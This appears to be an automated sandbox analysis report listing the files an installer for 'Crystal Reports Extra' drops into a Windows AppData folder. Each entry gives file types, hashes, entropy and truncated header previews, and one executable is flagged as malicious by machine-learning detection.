                                                          Preview: ............GDEF.(..........GPOS......!.....GSUB...:...,...VOS/2...........Vcmap..F...@....cvt +|Bv...|...$fpgm..^........dglyf8..=...T....head..Rk.......6hhea.......D...$hmtx.=.........`loca*...........maxp...H...h... name.m.....@....postqL.....@...RprepS0_....p.............C.._.<..........c.......c.......4.........................3...:.4.................X.....X.............<.@...D.o.......s.........b.......b.....C.M.................. @........PfEd.@..%......................)...........<...S.d...d...d...d...d.g.d...d...d...d.n.d...d...d...........O.S.d.................w.......`...........................................9.......|.......}...................5...D...w...C.......`.....(.......$.I...I...................C...T.............................................................$...........................a..."...8.......n...8...0.......T...........N.....D...........x...<.......T...r...............n...C.....d.......q.......g...d...x...W...d...t.!.d.............3...`.d...d...d.<.d...d
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-K99HI.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2001, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):58240
                                                          Entropy (8bit):5.620492732134304
                                                          Encrypted:false
                                                          SSDEEP:1536:Q42z0R0cX1S641B6rG+Xp+jPAh7n/pOkfH4r:2QWcXEpX6a+Xp+jo1/pOUHi
                                                          MD5:CC2EE1B756FC72A58C52294854FA35D7
                                                          SHA1:58E6658240C710DD7EB9DE46FDD8515390219196
                                                          SHA-256:B9920211B0E1D19B55FBEF3CB602248FA8F0FF87598878769188209CBB7F6EAC
                                                          SHA-512:1BCC638F7D8901CFE4DCA2983F9C6EFB31C7A5FCAEEEAE06F6252E428111E709F3EDFA55868FFEA412D7BB10F995D81AC7E0C36BA37F8AABB6C985B5B2DC15EF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ...........@GDEF.......L...NGPOS.D.........tGSUB...........,LTSH&%%....<....OS/2...........VVDMX.......0....cmap*.9.........cvt ~..........Rfpgm..^....D...dgasp............glyfCR+........$hdmx0..%.......Hhead.......$...6hhea.F.....\...$hmtx...X......Tloca.0.T.......Xmaxp.......,... name.......L....post.......h....prepS0_....p.............F........./...0.0...1.a...b.e...f.t...u.v...w......................................guru................abvm...............................B...&.0.....................................0.0.......2.:.....@.\.....:.................................................n.t.....0.0...b.e...u.v.............F.F...N.N.............@...0.8.....H.....X.....X.....P.....`...........p.....................................................................................&.d..guru........................abvs. blwf.&nukt.,psts.2vatu.8.......................................&...X.......R.......................<.........................(.:.L.^.p...............^...B........... ...
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\lohit_hi.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 14 names, Macintosh
                                                          Category:dropped
                                                          Size (bytes):76600
                                                          Entropy (8bit):6.3178993263494165
                                                          Encrypted:false
                                                          SSDEEP:1536:V6ksURZ3E0fWPnVV9X15POG/EVy0Mft4tb1a7Il/6gbScGTDI1uw44f:VpvPRfWPVXj1EVut4V1a7GygGgr
                                                          MD5:4808DDF3A48DC3B6A4F93DBD3D17EB4E
                                                          SHA1:0629A606CF59C08EBCF53DCD9535AE0D30755903
                                                          SHA-256:5EA6D5AF952385A37B83EB3821253D46542AF509673ADD90075E7FEAF1D8B453
                                                          SHA-512:F48B68DC4F4C90125347A8327F8D5C91636630528B5B033045401C784B088FD00FC812B978D4466779419C3EC1AD726B1DA41308079E86A1DB62FBB7E8CAEE88
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ............GDEF.(..........GPOS......!.....GSUB...:...,...VOS/2...........Vcmap..F...@....cvt +|Bv...|...$fpgm..^........dglyf8..=...T....head..Rk.......6hhea.......D...$hmtx.=.........`loca*...........maxp...H...h... name.m.....@....postqL.....@...RprepS0_....p.............C.._.<..........c.......c.......4.........................3...:.4.................X.....X.............<.@...D.o.......s.........b.......b.....C.M.................. @........PfEd.@..%......................)...........<...S.d...d...d...d...d.g.d...d...d...d.n.d...d...d...........O.S.d.................w.......`...........................................9.......|.......}...................5...D...w...C.......`.....(.......$.I...I...................C...T.............................................................$...........................a..."...8.......n...8...0.......T...........N.....D...........x...<.......T...r...............n...C.....d.......q.......g...d...x...W...d...t.!.d.............3...`.d...d...d.<.d...d
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\lohit_pa.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2001, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):58240
                                                          Entropy (8bit):5.620492732134304
                                                          Encrypted:false
                                                          SSDEEP:1536:Q42z0R0cX1S641B6rG+Xp+jPAh7n/pOkfH4r:2QWcXEpX6a+Xp+jo1/pOUHi
                                                          MD5:CC2EE1B756FC72A58C52294854FA35D7
                                                          SHA1:58E6658240C710DD7EB9DE46FDD8515390219196
                                                          SHA-256:B9920211B0E1D19B55FBEF3CB602248FA8F0FF87598878769188209CBB7F6EAC
                                                          SHA-512:1BCC638F7D8901CFE4DCA2983F9C6EFB31C7A5FCAEEEAE06F6252E428111E709F3EDFA55868FFEA412D7BB10F995D81AC7E0C36BA37F8AABB6C985B5B2DC15EF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ...........@GDEF.......L...NGPOS.D.........tGSUB...........,LTSH&%%....<....OS/2...........VVDMX.......0....cmap*.9.........cvt ~..........Rfpgm..^....D...dgasp............glyfCR+........$hdmx0..%.......Hhead.......$...6hhea.F.....\...$hmtx...X......Tloca.0.T.......Xmaxp.......,... name.......L....post.......h....prepS0_....p.............F........./...0.0...1.a...b.e...f.t...u.v...w......................................guru................abvm...............................B...&.0.....................................0.0.......2.:.....@.\.....:.................................................n.t.....0.0...b.e...u.v.............F.F...N.N.............@...0.8.....H.....X.....X.....P.....`...........p.....................................................................................&.d..guru........................abvs. blwf.&nukt.,psts.2vatu.8.......................................&...X.......R.......................<.........................(.:.L.^.p...............^...B........... ...
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\lohit_ta.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2003, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):64760
                                                          Entropy (8bit):6.514217361307989
                                                          Encrypted:false
                                                          SSDEEP:1536:/JkO5XuoOM3qn3RDWuLHmBET8La0O5dGXwZR:x75Xu5n3BWubmST8ufdGAz
                                                          MD5:2E6070E9B26AC1377F9208C320D62591
                                                          SHA1:A5C6D4AC71748C0979968A40180A575F611C73D4
                                                          SHA-256:9499F3B7446292DC164A7ACDABD8B6B38AE3D94B9D092004C1ED48DCBB83BB44
                                                          SHA-512:06EB42262382E78D83D48D554EA4453AFB36887C57643CED6128139B71D4465544B79689D939DE52F6EB426788153F71B79F1E3D70563D51632A12D743E5714F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ...........@GDEF.&.%...L....GPOS"v/....l....GSUBlT.....t....LTSHSr.........#OS/2...........VVDMX[zc....t....cmap&.`...T....cvt ......`...xfpgm..^........dgasp.......<....glyf0y.....L...Rhdmx3.>V......Dhead...........6hhea...........$hmtx......@...|loca...E......@maxp........... name............post....... ....prepS0_................................................*.8..taml......ENG ..................abvm.......................|...................................................................................h.........................................u.u...................u.u.................................................2.v..taml......ENG ..........................abvs. akhn.(half..haln.4psts.:...........................................".*.2.:.B.J.......@.......V.......x.................................................................r.r.........4.8.<.@.D.H.L.P.T.X.\.`.d.h.l.p.t.x.|...........\...^...`...b...d...f...h...j...l...n...p...r...t...v...x...z...|...~..................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\history.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):421792
                                                          Entropy (8bit):5.89089312168092
                                                          Encrypted:false
                                                          SSDEEP:6144:IBv/Y6oqGY2NID1MMf07QxjopowBvBBvm:IBv/Y6oiYIup7QVopowBvBBvm
                                                          MD5:10F4396344E93CE328529A26CC026082
                                                          SHA1:51895B0BE7B772EBE747336E4E0F57D8BBC5D277
                                                          SHA-256:5CA366D8C7102434E6D8E80C30BA3B4FD99AB5082C629C95D7F870DD8F0F8A27
                                                          SHA-512:770A801011E2FCA3052AF437CAE4930A1BCAF2CAE55FFC7A29249196B26AF7599551BDE4C7CEBDB6472E1A400182E711B9590CBAC90A9F28C7F10FBE37FA064D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: GNU GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed... Preamble.. The GNU General Public License is a free, copyleft license for.software and other kinds of works... The licenses for most software and other practical works are designed.to take away your freedom to share and change the works. By contrast,.the GNU General Public License is intended to guarantee your freedom to.share and change all versions of a program--to make sure it remains free.software for all its users. We, the Free Software Foundation, use the.GNU General Public License for most of our software; it applies also to.any other work released this way by its authors. You can apply it to.your programs, too... When we speak of free software, we are referring to
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-0V44S.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):229376
                                                          Entropy (8bit):6.403618531896028
                                                          Encrypted:false
                                                          SSDEEP:3072:hNj+F2PYTwAEbc8NnQPgd/5LV9Saotx2xhz4lzZoIWpJatWCETGBxdxz0dIAJo9o:NBQdgdhLV02m8pJYETywe9sibJZw
                                                          MD5:B7C7BC0C790C4BA8AE2E7C8608710C3E
                                                          SHA1:8CBE580B7D6C67963563ED69495FF6387EDB0F0E
                                                          SHA-256:6C8B148B4A223D9372D7B56A2BFD5AF5DB0AB9BEF74C3423DE8B2D4E335C3E85
                                                          SHA-512:E60381D44D72A61D73E3959FDB2C8857E6130A0C3E5CAEA64EC55B9C4C41B33FFB347585C7B02501BF06F21B699CB8CB2D48DB5A689BD295BDB06E6CE82C7A27
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........|......0........ .....c................................W......... .........................|.......................................D.......................................................p............................text...............................`.P`.data...H.... ......................@.0..rdata...?...0...@..................@.`@.bss.........p........................`..edata..|............P..............@.0@.idata...............R..............@.0..CRT....,............j..............@.0..tls.... ............l..............@.0..rsrc................n..............@.0..reloc..D............r..............@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-GS64B.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50688
                                                          Entropy (8bit):6.258238022202296
                                                          Encrypted:false
                                                          SSDEEP:1536:LBv1ky0ucs9y43wtHs9AjOQ0oHmfFDbJfhSuH:LBq4pyv29wMoHkFDbJfhf
                                                          MD5:B690FDD8FCD1C2700F35388E9B1E5974
                                                          SHA1:51669DD917B3F81B7D4526AF36938DCF8C0AA7D9
                                                          SHA-256:3D5A5623CDEA823A14102A43CAC78902A73840434BA0FE9447AA8F37F887AF4A
                                                          SHA-512:D8F63A1893211D958A47EDDC9CFC5DE7F8FDF7F530662722D2176C8CAF4B8D0791F43BB59048FB075C7F820FB86BD8C79FE96696392A7E336860638A3CEE6B9E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0..............b.........................@............... .........................{.......L.... .......................0.......................................................................................text..............................`.P`.data...D...........................@.0..rdata..`...........................@.`@.bss..................................`..edata..{...........................@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qgif4.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50688
                                                          Entropy (8bit):6.258238022202296
                                                          Encrypted:false
                                                          SSDEEP:1536:LBv1ky0ucs9y43wtHs9AjOQ0oHmfFDbJfhSuH:LBq4pyv29wMoHkFDbJfhf
                                                          MD5:B690FDD8FCD1C2700F35388E9B1E5974
                                                          SHA1:51669DD917B3F81B7D4526AF36938DCF8C0AA7D9
                                                          SHA-256:3D5A5623CDEA823A14102A43CAC78902A73840434BA0FE9447AA8F37F887AF4A
                                                          SHA-512:D8F63A1893211D958A47EDDC9CFC5DE7F8FDF7F530662722D2176C8CAF4B8D0791F43BB59048FB075C7F820FB86BD8C79FE96696392A7E336860638A3CEE6B9E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0..............b.........................@............... .........................{.......L.... .......................0.......................................................................................text..............................`.P`.data...D...........................@.0..rdata..`...........................@.`@.bss..................................`..edata..{...........................@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qjpeg4.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):229376
                                                          Entropy (8bit):6.403618531896028
                                                          Encrypted:false
                                                          SSDEEP:3072:hNj+F2PYTwAEbc8NnQPgd/5LV9Saotx2xhz4lzZoIWpJatWCETGBxdxz0dIAJo9o:NBQdgdhLV02m8pJYETywe9sibJZw
                                                          MD5:B7C7BC0C790C4BA8AE2E7C8608710C3E
                                                          SHA1:8CBE580B7D6C67963563ED69495FF6387EDB0F0E
                                                          SHA-256:6C8B148B4A223D9372D7B56A2BFD5AF5DB0AB9BEF74C3423DE8B2D4E335C3E85
                                                          SHA-512:E60381D44D72A61D73E3959FDB2C8857E6130A0C3E5CAEA64EC55B9C4C41B33FFB347585C7B02501BF06F21B699CB8CB2D48DB5A689BD295BDB06E6CE82C7A27
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........|......0........ .....c................................W......... .........................|.......................................D.......................................................p............................text...............................`.P`.data...H.... ......................@.0..rdata...?...0...@..................@.`@.bss.........p........................`..edata..|............P..............@.0@.idata...............R..............@.0..CRT....,............j..............@.0..tls.... ............l..............@.0..rsrc................n..............@.0..reloc..D............r..............@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-1UL10.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41984
                                                          Entropy (8bit):6.132770955803513
                                                          Encrypted:false
                                                          SSDEEP:768:bgaowTgGpoQHcE4UJmcCqr7/rz/WGc4kedF0emlBQQhpjxH:bgsppvHc1Cb7ldnmlBQkdH
                                                          MD5:4D233A220F91DE3B1510D017B5481942
                                                          SHA1:C59F449B0D09127D18268E7B07DA3F7D749B2720
                                                          SHA-256:08336089E280805C8AC89F7476526F944B5868C014748B6DC29F65167E9E3AB0
                                                          SHA-512:A86A1F9B5D160813C6E2F771962F303428604057B9613021BF7844C1204CFCA0A18571A28D950D7999ACC4ECDE0605095F9A460A9B79FE2BBE02F080C2683923
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.....t..........0..............m......................... ................ .........................O...............p.......................@.......................................................p............................text....s.......t..................`.P`.data...T............x..............@.0..rdata..,............z..............@.`@.bss..................................`..edata..O...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...p...........................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-33ENG.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):182365
                                                          Entropy (8bit):6.791628337519772
                                                          Encrypted:false
                                                          SSDEEP:3072:FiP8zpgWMwBsaEcWfsUGPWTSMqqDVw7P3FwBP1ELFy:Fu8NsgsidwxqqDVMFwBaFy
                                                          MD5:854C550450BEDDEBAAFE1DD74F073641
                                                          SHA1:3DB1545773EA7756D6A87B3693148ABCD1CDAB86
                                                          SHA-256:8561D32E30B3DEC9FFD24B1BD87E96444FD6D3D304D64F80C6D99E112411DC48
                                                          SHA-512:42AF4079F184A0F8E22689F55DFA225F10B20FF8C0816D728CE022573E5EF1F1412B87000F0EF375D7DFC2A1D734A2047D539597EA4FE8EF1D5A2895053C50D1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...z.......8.....& ..........................pj.............................@.......I........ .................................................`............................ .............................. ...(....................................................text............................... .P`.data...P...........................@.P..rdata..............................@.`@/4......5............p..............@.0@.pdata...............r..............@.0@.xdata..............................@.0@.bss....0.............................`..edata........... ..................@.0@.idata..`...........................@.0..CRT....X...........................@.@..tls....h...........................@.`..reloc....... ......................@.0B/14..........0......................@.0B........................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5F8P5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.027050012874634
                                                          Encrypted:false
                                                          SSDEEP:768:bKZB2wewH8k43RncCqCbj9zAwLc0N+eD5JemQRR5Q7:bKZr5H8VmuECDGmQRR5Q7
                                                          MD5:CF2571C125FA1D2EC55B9977054F380A
                                                          SHA1:91014DD50F0EEB0D3D1FAED77541C76A05B712B8
                                                          SHA-256:02B817B6DB18DB2DFCCEFDD08EED64A696E2BF326F4120EE7E93AE6AA73BCCB3
                                                          SHA-512:A95BF3436EA2FAC443924C5FC31FCD4337A44702EF38CA82D744474301E53F14721EAEB0F21E515CCFF8569E7B7D81107FB5A4CF2AE485CD4A5D2DC95DAE8F9B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.....d..........0..............e................................8......... .....................................................................................................................`................................text....b.......d..................`.P`.data...D............h..............@.0..rdata..,............j..............@.`@.bss..................................`..edata...............v..............@.0@.idata...............x..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5P6B9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):120774
                                                          Entropy (8bit):6.037077757732975
                                                          Encrypted:false
                                                          SSDEEP:3072:nPE0Yx2cwD/Dtixvr6FkTwCD4N8FBKd8UR:sMzD/amFE4NQKd8UR
                                                          MD5:082A8171C726E58C1618DA3781AB7833
                                                          SHA1:5D74E7F8F5E14C1A70331A03456C68BB33AC17E2
                                                          SHA-256:AE1A1179289D1AB3B406F4BB347284464123C51BE50C1BCF38F2B5DD691E065C
                                                          SHA-512:837433AA29DFF1BD35AEB800B8DC69FB881BB2C435BF5BBA0AD7E809AD4CEA765B179DB4024A53F92E6B905FC964F23ED79949FA84424F864BBB88F140BD8682
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........o.....& ...........................a.............................P................ .................................................x.... .......................0.............................. ...(.......................P............................text...`........................... .P`.data........ ......................@.`..rdata...h...0...j..................@.`@/4......5...........................@.0@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..x...........................@.0..CRT....X...........................@.@..tls....h...........................@.`..rsrc........ ......................@.0..reloc.......0......................@.0B/14..........@......................@.0B................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-7MTO8.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4910592
                                                          Entropy (8bit):6.572031041695352
                                                          Encrypted:false
                                                          SSDEEP:49152:dYQUcTX0/fq7b81I89fNkiiD3khqwqREQDfqtd4keAG4/lqQNOhw5XlAzmGLateC:5zB7b8O8QZrjwwhw5XlACGm8CtxARti
                                                          MD5:11DD538F1BF5F174834DBA334964A691
                                                          SHA1:3B080FA94C71CFAB65A0CD407EACAC4C2B1B2378
                                                          SHA-256:1BC4B73613228169EF7F57222EF36A6D9B3A2F3347EFA2228C53DC3B83559888
                                                          SHA-512:8E0A0455BDECBA073B06BE610917C71B6082745DF91B34C2663BC8D86361E71EA8FFF3D222E087AA3560A1AEE3455CA1DC7F2957726D86B001F4124DE220F911
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......!...ep.ep.ep.l.A.up.../.ap.7..zp.7..ip.7..bp..-.vp.7..ap.q..ip....tp.ep.9y....dp.3..eq.3.-.dp.epE.dp.3..dp.Richep.9;..N..Rich.N..........PE..L.....Ra.................T6.........dQ(......p6...@..........................@K.......J.......................................G.P....pH.H.............................D.p.....................D.....@.D.@............p6..............................text....S6......T6................. ....rdata.......p6......X6.............@..@.data....4...0G.......G.............@....rsrc...H....pH......(H.............@..@........................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-AFSCM.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):6.294286952115658
                                                          Encrypted:false
                                                          SSDEEP:768:BZIF0ff+vrzUHQH/E4zR2cCqz7iDz3Kocq8eeIKKem+nH3g/i3/:BWFsf+vrzUwH/15EzFeIWm+H3R3
                                                          MD5:84E8E72572D53558D52403011FA0D388
                                                          SHA1:865160DA7DBFAAEA224541EB44E9430E1A7B7B20
                                                          SHA-256:CA717B5CF2A7B0E047AABAD985C631278941C58F16E2E9650CA12C3A331FCD4F
                                                          SHA-512:47EE932BFA4EE3C51C3828EF8C6923E5B946966AD8E255BC2C53A60443AA2D4AB17521F21912A6F0469C7898D6543DC4B1783A86DDB5A84568818A7B37EC3992
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0.............hp......................... ................ .................................P...............................,...................................................4................................text...d...........................`.P`.data...D...........................@.0..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..P...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..,...........................@.0B........................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-B5IQO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.9471839268980276
                                                          Encrypted:false
                                                          SSDEEP:1536:1qkfBMFLAlVQtlJR5E7kGJasMaooupW51+SXKl6U22Ol2B:RZ4LRa7ksasM3f4C6d2Ol2B
                                                          MD5:8E8285AAC0EF77A6CEDE53EAFE9C5298
                                                          SHA1:8A4715C1C8591B83B925282AF5BA72832C1CA0FC
                                                          SHA-256:3A94A8E5F9AB0ECA82611F95DC78C07C5093574C772B9C19D590F8E959191973
                                                          SHA-512:04F24CFA4F187FBE897033359EB3A2DA19C4225B514E0D6EE269D741C8BF86D9F7A5860AE2DE676DF1748C0D64CCB9DD58758CBE1524FF938C99224AFD30997F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z^su>?.&>?.&>?.&.q.&??.&QI.&??.&QI.&5?.&QI.&:?.&QI.&8?.&7G.&=?.&>?.&v?.&%..&:?.&%..&??.&%..&??.&Rich>?.&........PE..d....M.U.........." .........N...............................................P............@.........................................@...........P....0....... ...............@..h...0................................................................................text............................... ..`.rdata...;.......<..................@..@.data... ...........................@....pdata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-FCT1V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):80653
                                                          Entropy (8bit):5.935029812256724
                                                          Encrypted:false
                                                          SSDEEP:1536:K7jqZI3jgg9IJgo+wrcKl8l2gdejHL8jT7x8ZKQi3uh:yUojggfo+wgl2gGHLYXx80T3uh
                                                          MD5:266FA5BAC8FAB45A57B3EB68495334F4
                                                          SHA1:C845B88A5F2279E348886E4D6246F855ACAA85B9
                                                          SHA-256:C8A3B86D6E930B21F428A3CAC3CC8FB432716D16043824DF886731565BFE8A23
                                                          SHA-512:EF8CAEF0A926865D4B1FE0CE51DC9542B814EB76392F85895A042AC514C529426519C83BCEC2EB976848D174D504E2852FA854C06A70D21F4E16DEBD533E3D0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........2..?.....& .........V.................e....................................;......... ......................................p..6.......(............@.......................0...................... ...(....................................................text............................... .P`.data...`...........................@.P..rdata..@,..........................@.`@/4......5....0......................@.0@.pdata.......@......................@.0@.xdata.......P......................@.0@.bss.........`........................`..edata..6....p......................@.0@.idata..(............ ..............@.0..CRT....X............*..............@.@..tls....h............,..............@.`..reloc..............................@.0B/14..................0..............@.0B........................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-HRO44.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):232976
                                                          Entropy (8bit):6.644092741800531
                                                          Encrypted:false
                                                          SSDEEP:6144:VBx0S/dXV86pr06/oG5NMR2jzm1YunTcUmAe0I70s0cYJyUqQmoUjW2v4ZzuFdA:hldXVjTD/m1YunTcZAe0I70s0cYQUqoX
                                                          MD5:A80D629D6329DC31D5CB1157D853AFAB
                                                          SHA1:A2FA781452106CDF17A83E3E59C6FE50D557E62C
                                                          SHA-256:500EE04865DBB7BEB9474E0C2AEBD6713DF4407C849EC134457C7D0CA289FAF0
                                                          SHA-512:4E0253615D4C3C418B93547370F416EDF5326BF66E3A5872C687B129E65E5967DC3D4AE97CF524CA5E77327B0CE07D93BA63470D541614A6685EBD26E0C7427B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gSg.#2.,#2.,#2.,*J.,.2.,*J.,:2.,..r,'2.,*J., 2.,#2.,.2.,*J.,.2.,*J.,"2.,*J.,"2.,Rich#2.,........PE..L.....{Y...........!................X................................................3...............................+... ......P....................x..................................................@............... ............................text...p........................... ..`.rdata..c...........................@..@.data...D2...P.......<..............@....reloc...$.......&...R..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-JEA3R.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):15099
                                                          Entropy (8bit):4.490145322936716
                                                          Encrypted:false
